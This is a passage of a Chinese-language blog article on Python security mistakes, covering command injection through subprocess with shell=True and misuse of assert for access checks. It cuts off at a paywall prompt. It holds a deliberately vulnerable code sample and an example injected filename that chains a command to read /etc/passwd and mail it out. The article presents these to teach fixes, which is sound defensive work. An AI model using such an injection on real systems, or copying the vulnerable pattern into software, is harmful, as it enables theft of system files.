本文介绍了Python开发中常见的安全问题,包括输入注入、命令注入、assert语句误用、计时攻击、临时文件风险、不安全的yaml.load使用等,并提供了相应的修复建议。学习如何在Python编程中确保代码安全,防止被滥用,适用于网络安全和信息安全专业人员。
- 输入注入(Input injection)
注入攻击非常广泛而且很常见,注入有很多种类,它们影响所有的语言、框架和环境。
命令注入可能在使用popen、subprocess、os.system 调用一个进程并从变量中获取参数时发生,当调用本地命令时,有人可能会将某些值设置为恶意值。
下面是个简单的脚本,使用用户提供的文件名调用子进程:
import subprocess
def transcode_file(request, filename):
command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
subprocess.call(command, shell=True) # a bad idea!
攻击者会将filename 的值设置为“; cat / etc / passwd | mailthem@domain.com 或者其他同样危险的东西。
修复:
如果你使用了Web 框架,可以用附带的实用程序对输入进行清理,除非有充分的理由,否则不要手动构建 SQL 查询,大多数 ORM 都具有内置的消毒方法。
对于shell,可以使用 shlex 模块正确地转义输入。
- assert 语句(Assert statements)
不要使用assert 语句来防止用户访问不应访问的代码段。
def foo(request, user):
assert user.is_admin, “user does not have access”
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
